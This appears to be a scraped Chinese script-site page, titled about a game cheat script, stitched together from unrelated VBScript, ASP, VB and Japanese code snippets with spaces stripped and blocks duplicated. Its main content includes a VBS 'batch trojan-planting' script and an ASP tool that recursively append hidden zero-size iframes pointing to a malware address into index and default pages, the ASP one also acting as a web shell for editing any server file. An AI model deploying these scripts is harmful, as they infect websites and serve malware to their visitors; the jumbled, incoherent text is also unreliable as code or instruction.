飞易来dnf脚本lua 滑动

发布时间:2021-12-10 来源:脚本之家 点击:


  首先你的Windows系统中SYSTEM.INI文件关于[MCI]中需有MPEGVideo项(一般Windows95和Windows98中都已有此项,通过安装XingPlay或CCDVP95等软件也可增加此项)¥ ( ) 、 【 】 ; : ‘ ' “ ” , 《

有什么还能用的手游辅助脚本
scan.vbe
cscriptscan.vbeweb目录
程序代码:

'版权信息
br="************************************"&vbCrLf
br=br&"*VBS批量挂马脚本*"&vbCrLf
br=br&"*BYBanLG*"&vbCrLf
br=br&"************************************"&vbCrLf&vbCrLf
br=br&"cscriptscan.vbeD:"&vbCrLf

'马的地址
ma="</Script><IfRAMEheight=0width=0sRc="&chr(34)&""&chr(…t;</IFrAME>"
'要挂马的页面如果嫌不够还可以自己再加,记得要用”|”隔开
MyString="index.php|index.asp|index.html|index.htm|default.php|default.asp|default.html|default.htm|index.aspx|default.aspx"
'以"|"为分隔符拆分成数组
MyArray=Split(MyString,"|",-1,1)

web=WScript.Arguments(0)

'如果web为空退出脚本
ifweb=""then
Wscript.echo(br)
window.Close
endif

Wscript.echo(br)&"马的地址:"&ma&vbCrLf&vbCrLf
'创建对象
Setfso=createObject("Scripting.FileSystemObject")

'开始扫描挂马
scan(web)

'scan定义函数,扫描查找符合条件的文件把马的内容写到文件的结尾
subscan(filesder)
setfilesder=fso.getfolder(filesder)
'得到当前目录的所有文件集合
setfiles=filesder.files
'获取文件名
foreachfextinfiles
Setfile1=fso.GetFile(fext)
filesext=file1.Name
'把文件名转换成小写字母
ext=lcase(filesext)
ForEachindexinMyArray
'判断文件是不是我们在MyString里限定的文件,如果是就写马
ifext=lcase(index)then
Setts=fso.OpenTextFile(fext,8)'打开文件并在文件末尾进行写操作
ts.WriteLine(ma)
ts.Close
echo=""
echo=fext&"………….ok"
Wscript.echo(echo)
endif
next
next

setsubfolders=filesder.subfolders
foreachsubfolderinsubfolders'搜索其他目录,递归调用
scan(subfolder)
next
endsub


FSO挂马.asp
传进服务器以后直接输入需要挂马的路径就可以直接挂了
程序代码:

<%Server.ScriptTimeout=10000
Response.Buffer=False
%>
<html>
<head>
<title></title>
<****http-equiv="Content-Type"content="text/html;charset=gb2312">
</head>
<body>
<%
ASP_SELF=Request.ServerVariables("PATH_INFO")

s=Request("fd")
ex=Request("ex")
pth=Request("pth")
newcnt=Request("newcnt")

Ifex<>""ANDpth<>""Then
selectCaseex
Case"edit"
CALLfile_show(pth)
Case"save"
CALLfile_save(pth)
Endselect
Else
%>
<formaction="<%=ASP_SELF%>"method="POST">
FOLDER(ABSOLUTEPATH):
<inputtype="text"name="fd"size="40">
<inputtype="submit"value="SUBMIT">
</form>
<%EndIf%>
<%
FunctionIsPattern(patt,str)
SetregEx=NewRegExp
regEx.Pattern=patt
regEx.IgnoreCase=True
retVal=regEx.Test(str)
SetregEx=Nothing
IfretVal=TrueThen
IsPattern=True
Else
IsPattern=False
EndIf
EndFunction

IfIsPattern("[^ab]{1}:{1}(\\|/)",s)Then
schs
Else
Ifs<>""ThenResponse.Write"InvalidAgrument!"
EndIf

Subsch(s)
oNeRrOrrEsUmEnExT
Setfs=Server.createObject("Scripting.FileSystemObject")
Setfd=fs.GetFolder(s)
Setfi=fd.Files
Setsf=fd.SubFolders
ForEachfinfi
rtn=f.Path
step_allrtn
Next
Ifsf.Count<>0Then
ForEachlInsf
schl
Next
EndIf
EndSub

Substep_all(agr)
retVal=IsPattern("(\\|/)(default|index)\.(htm|html|asp|php|jsp|aspx)\b",agr)
IfretValThen
step1agr
step2agr
Else
ExitSub
EndIf
EndSub
%>
<%Substep1(str1)%>
<ahref=""target="_blank"><%=str1%></a><br>
<%EndSub%>
<%
Substep2(str2)
addcode="<iframesrc=(修改为你的马的地址,不要加""不然会出错)width=0height=0frameborder=0></iframe>"
Setfs=Server.createObject("Scripting.FileSystemObject")
isExist=fs.FileExists(str2)
IfisExistThen
Setf=fs.GetFile(str2)
Setf_addcode=f.OpenAsTextStream(8,-2)
f_addcode.Writeaddcode
f_addcode.Close
Setf=Nothing
EndIf
Setfs=Nothing
EndSub
%>
<%
Subfile_show(fname)
Setfs1=Server.createObject("Scripting.FileSystemObject")
isExist=fs1.FileExists(fname)
IfisExistThen
Setfcnt=fs1.OpenTextFile(fname)
cnt=fcnt.ReadAll
fcnt.Close
Setfs1=Nothing%>
FILE:<%=fname%>
<formaction="<%=ASP_SELF%>"method="POST">
<textareaname="newcnt"cols="100"rows="30"><%=cnt%></textarea>
<inputtype="hidden"name="pth"value="<%=fname%>">
<inputtype="hidden"name="ex"value="save">
<inputtype="submit"value="SAVE">
</form>
<%Else%>
<p>THEFILEISNOTEXITORHAVEdeleteD.</p>
<%
EndIf
EndSub
%>
<%
Subfile_save(fname)
Setfs2=Server.createObject("Scripting.FileSystemObject")
Setnewf=fs2.createTextFile(fname,True)
newf.Writenewcnt
newf.Close
Setfs2=Nothing
Response.Write"<p>THEFILEWASMODIFIEDSUCCESSFULLY.</p>"
EndSub
%>
</body>
</html>
这里用到两个API函数,LoadCursorFromFile用于装入新光标(xin),需要指明新光标的具体路径及文件名;SetClassLong用于设置使用新光标(xin)

'FileName:ProcessMagnifier.vbs
'Function:Captureinformationabouttherunningprocessesindetail
'codebysomebody
'QQ:240460440
'LastModified:2007-11-1618:25
'仅供学习

ConstHKEY_CURRENT_USER=&H80000001
oReg=GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\default:StdRegProv")
strKeyPath="Console\%SystemRoot%_system32_cmd.exe"
oReg.CreateKey(HKEY_CURRENT_USER,strKeyPath)
strValueName1="CodePage"
dwValue1=936
strValueName2="ScreenBufferSize"
dwValue2=98304200
strValueName3="WindowSize"
dwValue3=2818173
strValueName4="HistoryNoDup"
dwValue4=0
strValueName5="WindowPosition"
dwValue5=131068
strValueName6="QuickEdit"
dwValue6=2048
oReg.SetDWORDValue(HKEY_CURRENT_USER,strKeyPath,strValueName1,dwValue1)
oReg.SetDWORDValue(HKEY_CURRENT_USER,strKeyPath,strValueName2,dwValue2)
oReg.SetDWORDValue(HKEY_CURRENT_USER,strKeyPath,strValueName3,dwValue3)
oReg.SetDWORDValue(HKEY_CURRENT_USER,strKeyPath,strValueName4,dwValue4)
oReg.SetDWORDValue(HKEY_CURRENT_USER,strKeyPath,strValueName5,dwValue5)
oReg.SetDWORDValue(HKEY_CURRENT_USER,strKeyPath,strValueName6,dwValue6)


DimobjWSH,FinalPath
objWSH=WScript.CreateObject("WScript.Shell")
If(LCase(Right(WScript.Fullname,11))="wscript.exe")Then
FinalPath="'"&WScript.ScriptFullName&"'"
objWSH.Run("cmd.exe/kcscript//nologo"&Replace(FinalPath,"'",""""))
WScript.Quit()
EndIf

oReg.DeleteKey(HKEY_CURRENT_USER,strKeyPath)
oReg=Nothing

WScript.Echo()
WScript.Sleep(1000)
WScript.Echo("当前正在运行的进程简要信息列表如下:")
WScript.Echo(vbCrLf)
WScript.Sleep(2000)

DimMyOBJProcessName
OBJWMIProcess=GetObject("winmgmts:\\.\root\cimv2").ExecQuery("Select*FromWin32_Process")
WScript.Echo"Name:Priority:PID:Owner:"&vbTab&vbTab&"ExecutablePath:"
WScript.Echo("---------------------------------------------------------------------------------------")
ForEachOBJProcessInOBJWMIProcess
MyOBJProcessName=OBJProcess.Name&""
colProperties=OBJProcess.GetOwner(strNameOfUser,strUserDomain)
WScript.EchoMid(MyOBJProcessName,1,20)&vbTab&OBJProcess.Priority&vbTab&OBJProcess.ProcessID&vbTab&strNameOfUser&vbTab&vbTab&OBJProcess.ExecutablePath
Next

WScript.Sleep(5000)
WScript.Echo(vbCrLf)
WScript.Echo("当前正在运行的进程以及其加载的模块详细信息树状结构如下:")
WScript.Echo(vbCrLf)
WScript.Sleep(3000)
WScript.EchovbTab&vbTab&vbTab&vbTab&vbTab&vbTab&vbTab&vbTab&vbTab&vbTab&vbTab&vbTab&vbTab&vbTab&vbTab&vbTab&vbTab&"创建时间文件制造商"

OBJWMIService=GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\cimv2")
OBJRefresher=CreateObject("WbemScripting.SWbemRefresher")
colItems=OBJRefresher.AddEnum(OBJWMIService,"Win32_PerfFormattedData_PerfProc_FullImage_Costly").ObjectSet
OBJRefresher.Refresh()
ForEachOBJItemIncolItems
DimoriginalPath,ModulePath,WMIPathMode,FileManufacturer,LCaseModulePath
DimFileExtension,mark,MyLCaseModulePath,FinalModulePath
originalPath=OBJItem.Name
ModulePath=Split(originalPath,"/")
WMIPathMode=Replace(ModulePath(1),"","\")
OBJWMI=GetObject("winmgmts:\\.\root\CIMV2")
colManufacturer=OBJWMI.ExecQuery("SELECT*FROMCIM_DataFileWhereName='"&WMIPathMode&"'")
ForEachOBJManufacturerIncolManufacturer
FileManufacturer=Trim(OBJManufacturer.Manufacturer)
LCaseModulePath=LCase(Trim(OBJManufacturer.Name))
FileExtension=Right(LCaseModulePath,3)
MyLCaseModulePath=LCaseModulePath&""
FSO=CreateObject("Scripting.FileSystemObject").GetFile(LCaseModulePath)
IfFileExtension="exe"Then
mark="├—"
FinalModulePath=Mid(MyLCaseModulePath,1,118)
WScript.Echo("│")
Else
mark="│├─"
FinalModulePath=Mid(MyLCaseModulePath,1,116)
EndIf
WScript.Echomark&FinalModulePath&FSO.DateCreated&vbTab&FileManufacturer
Next
Next

->OptionExplicit
PrivateSubCommand1_Click()
DimIAsLong,JAsLong,KAsLong
DimPrintStringAsString
ForI=0ToData1.Recordset.RecordCount-1
IfK=DBGrid1.VisibleRowsThen
DBGrid1.Scroll0,DBGrid1.VisibleRows
K=0
EndIf
ForJ=0ToDBGrid1.Columns.Count-1
PrintString=PrintString&
DBGrid1.Columns(J).CellText(DBGrid1.RowBookmark(K))&"/"
Next
Printer.PrintPrintString
PrintString=""
K=K 1
DoEvents
Next
EndSub

PrivateSubForm_Activate()
Data1.Recordset.MoveLast
Data1.Recordset.MoveFirst
EndSub->
->


strServerName=""localhost""
strRootPath=""g:\documents""''虚拟目录路径
strVRName=""Test""''虚拟目录名称
strDefaultDoc=""index.asp""''起始文档

DimobjIIS
''MsgBox""""&strServerName&""/W3SVC/1""

OnErrorResumeNext
SetobjIIS=GetObject(""""&strServerName&""/W3SVC/1"")

Iferr=-2147024893Then
MsgBox""IIS不存在!""&vbcrlf&""请验证IIS是否已正确安装!"",vbcritical
Wscript.Quit
ElseIferr<>0Then
MsgBox""未知错误!"",vbcritical
Wscript.Quit
EndIf

OnErrorGoTo0

SetobjVirtualDir=objIIS.GetObject(""IISWebVirtualDir"",""Root"")
ForeachVRinobjVirtualDir
IfVR.Name=strVRNameThen
MsgBox""虚拟目录""&strVRName&""已存在!"",vbinformation
Wscript.Quit
EndIf
Next

OnErrorResumeNext
Setfs=Wscript.CreateObject(""Scripting.FileSystemObject"")
SetobjFolder=fs.GetFolder(strRootPath)

Iferr=76Then
MsgBox""路径""&strRootPath&""不存在!"",vbcritical
Wscript.Quit
EndIf

SetobjFolder=nothing
Setfs=nothing
OnErrorGoTo0

OnErrorResumeNext
SetVirDir=objVirtualDir.Create(""IISWebVirtualDir"",strVRName)
VirDir.AccessRead=true
VirDir.Path=strRootPath
VirDir.DefaultDoc=VirDir.DefaultDoc&"",""&strDefaultDoc

VirDir.setInfo

Iferr<>0Then
MsgBox""创建虚拟目录失败!"",vbcritical
Else
MsgBox""虚拟目录""&strVRName&""成功创建在服务器""&strServerName&""上!"",vbinformation
EndIf

代码的关键在于创建虚拟目录,及其中的配置:

SetVirDir=objVirtualDir.Create(""IISWebVirtualDir"",strVRName)
VirDir.AccessRead=true
VirDir.Path=strRootPath
VirDir.DefaultDoc=VirDir.DefaultDoc&"",""&strDefaultDoc

VirDir.setInfo


通常使用ADD方法,其语法如下:

   Nodes.Add(relative,[relationship][,key][,text][,image][,selectedimage])

  各个参数的意义如下:

   relationship参数是通过关系节点参数与新节点连接的另一个节点;
   relationship参数可能是以下情况:
     tvwlast--1;该节点置于所有其他的在relative中被命名的同一级别的节点的后面
     tvwNext--2;该节点置于在relative中被命名节点的后面
     tvwPrevius--3;该节点置于在relative中被命名的节点的前面
     tvwChild--4;该节点成为在relative中被命名的节点的的子节点

  下面是一个例子:

   Dimnode1,node2,node3,node4asNode
   setNode1=TreeView1.Nodes.Add
   TreeView1.Nodes(1).text="node1"
   TreeView1.Nodes(1).key="node1"
   Setnode2=treeview.nodes.add("node1",tvwChild,"node2")
   TreeView1.Nodes(2).text="node2"
   TreeView1.Nodes(2).key="node2"

  依次插入节点即可

msgbox "文件最后访问时间:"&fn.DateLastAccessed
钢琴块怎样运行

----6)ComEventRxParity:其值为1009,奇偶校验
Class clsGetProfile
' ルートドキュメント
Private rootDoc
' xmlファイル名とセクション名をセットする
' 引数: 「1」ファイル名 NOT NULL
' 戻り値:なし
Public Sub setProfile(strFileName)
Set data_xml=CreateObject("Microsoft.XMLDOM")
data_xml.async=False
data_xml.load(strFileName)
Set rootDoc=data_xml.documentElement
End Sub
' キーの対応する値を取得する
' 引数: 「1」キー名  NOT NULL
' 「2」セクション名 NOT NULL
' 戻り値:キーの対応する値
Public Function getItem(strSectionName, itemName)
Set sectionNode=rootDoc.selectSingleNode(strSectionName)
getItem=sectionNode.selectSingleNode(itemName).attributes(0).nodeValue
End Function
End Class
' 使用サンプル
' クラスインスタンスを生成する
'Dim config : Set config=New clsGetProfile
' 配置ファイル名とセクション名をセットする
'Call config.setProfile("Config.xml")
' きーの対応する値をゲットする
'WScript.Echo config.getItem("MessageDefine", "INFO.001")
'WScript.Echo config.getItem("MessageDefine", "INFO.003")
'WScript.Echo config.getItem("MessageDefine", "ERROR.009")
'WScript.Echo config.getItem("MessageDefine", "ERROR.012")
Class clsGetProfile
' ルートドキュメント
Private rootDoc
' xmlファイル名とセクション名をセットする
' 引数: 「1」ファイル名 NOT NULL
' 戻り値:なし
Public Sub setProfile(strFileName)
Set data_xml=CreateObject("Microsoft.XMLDOM")
data_xml.async=False
data_xml.load(strFileName)
Set rootDoc=data_xml.documentElement
End Sub
' キーの対応する値を取得する
' 引数: 「1」キー名  NOT NULL
' 「2」セクション名 NOT NULL
' 戻り値:キーの対応する値
Public Function getItem(strSectionName, itemName)
Set sectionNode=rootDoc.selectSingleNode(strSectionName)
getItem=sectionNode.selectSingleNode(itemName).attributes(0).nodeValue
End Function
End Class
' 使用サンプル
' クラスインスタンスを生成する
'Dim config : Set config=New clsGetProfile
' 配置ファイル名とセクション名をセットする
'Call config.setProfile("Config.xml")
' きーの対応する値をゲットする
'WScript.Echo config.getItem("MessageDefine", "INFO.001")
'WScript.Echo config.getItem("MessageDefine", "INFO.003")
'WScript.Echo config.getItem("MessageDefine", "ERROR.009")
'WScript.Echo config.getItem("MessageDefine", "ERROR.012")

网站地图 | Tag标签 | RSS订阅
Copyright © 2012-2019 脚本之家 All Rights Reserved
脚本之家  渝ICP备13030612号